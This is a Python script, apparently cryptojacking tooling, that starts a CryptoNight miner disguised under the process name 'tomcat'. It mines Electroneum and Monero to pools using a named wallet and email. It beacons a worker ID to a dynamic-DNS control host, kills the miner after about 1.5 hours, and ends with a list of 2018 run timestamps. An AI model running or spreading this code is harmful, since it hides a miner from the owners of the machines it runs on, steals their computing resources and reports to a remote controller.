import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:24:01.536215
#2018-02-17 16:12:06.861116
#2018-02-17 18:01:04.367173
#2018-02-17 19:50:07.450959
#2018-02-17 21:39:07.310571
#2018-02-17 23:23:04.749987
#2018-02-18 01:12:07.808806
#2018-02-18 03:01:05.429285
#2018-02-18 04:50:09.836256
#2018-02-18 06:41:02.121223
#2018-02-18 08:30:01.970921
#2018-02-18 10:17:05.731025
#2018-02-18 12:03:01.240609
#2018-02-18 13:48:04.043074
#2018-02-18 15:38:05.784444
#2018-02-18 17:27:05.091533
#2018-02-18 19:15:07.045397
#2018-02-18 21:01:06.399456
#2018-02-18 22:47:03.656876
#2018-02-19 00:36:01.839328
#2018-02-19 02:22:04.975801
#2018-02-19 04:09:04.078548
#2018-02-19 05:53:04.829563
#2018-02-19 07:41:03.620212
#2018-02-19 09:30:10.019183
#2018-02-19 11:19:06.149476
#2018-02-19 13:07:02.210246
#2018-02-19 14:55:02.178380
#2018-02-19 16:42:05.958540
#2018-02-19 18:29:01.786700
#2018-02-19 20:16:06.126201
#2018-02-19 22:05:06.592934
#2018-02-19 23:51:05.904352
#2018-02-20 01:38:05.673573
#2018-02-20 03:26:06.802405
#2018-02-20 05:13:01.730592
#2018-02-20 06:56:01.761543
#2018-02-20 08:42:07.733362
#2018-02-20 10:26:08.028322
#2018-02-20 12:11:06.443692
#2018-02-20 13:58:07.685289
#2018-02-20 15:41:01.995675
#2018-02-20 17:26:08.346115
#2018-02-20 19:14:10.238191
#2018-02-20 21:03:01.604840
#2018-02-20 22:48:04.279567
#2018-02-21 00:32:03.944063
#2018-02-21 02:17:05.777081
#2018-02-21 04:04:06.239372
#2018-02-21 05:50:06.068813
#2018-02-21 07:37:06.618837
#2018-02-21 09:22:05.513281
#2018-02-21 11:12:07.009205
#2018-02-21 12:59:09.947800
#2018-02-21 14:46:09.164319
#2018-02-21 16:34:04.459894
#2018-02-21 18:25:04.160105
#2018-02-21 20:09:04.000539
#2018-02-21 21:56:05.273055
#2018-02-21 23:45:10.555154
#2018-02-22 01:35:01.584531
#2018-02-22 03:23:01.396607
#2018-02-22 05:10:09.023384
#2018-02-22 06:54:07.875776
#2018-02-22 08:43:08.296701
#2018-02-22 10:31:02.066134
#2018-02-22 12:16:06.712922
#2018-02-22 14:02:06.505386
#2018-02-22 15:51:04.486380
#2018-02-22 17:38:06.891627
#2018-02-22 19:24:02.063335
#2018-02-22 21:17:07.070963
#2018-02-22 23:02:04.846225
#2018-02-23 00:49:05.913531
#2018-02-23 02:37:05.823244
#2018-02-23 04:25:07.093170
#2018-02-23 06:13:01.848529
#2018-02-23 07:58:05.527117
#2018-02-23 10:12:01.222782
#2018-02-23 12:07:06.874249
#2018-02-23 13:56:05.149610
#2018-02-23 15:47:09.356167
#2018-02-23 17:33:07.540077
#2018-02-23 19:21:06.273650
#2018-02-23 21:03:02.111161
#2018-02-23 22:47:05.394806
#2018-02-24 00:34:03.603351
#2018-02-24 02:25:08.482935
#2018-02-24 04:17:07.146764
#2018-02-24 06:06:01.722917
#2018-02-24 07:53:07.245777
#2018-02-24 09:37:07.639078
#2018-02-24 11:32:03.972719
#2018-02-24 13:22:01.289856
#2018-02-24 15:12:05.341264
#2018-02-24 17:01:07.401644
#2018-02-24 18:49:05.600029
#2018-02-24 20:40:05.515666
#2018-02-24 22:48:01.613223
#2018-02-25 03:02:06.944278
#2018-02-25 05:32:07.234985
#2018-02-25 11:35:05.719748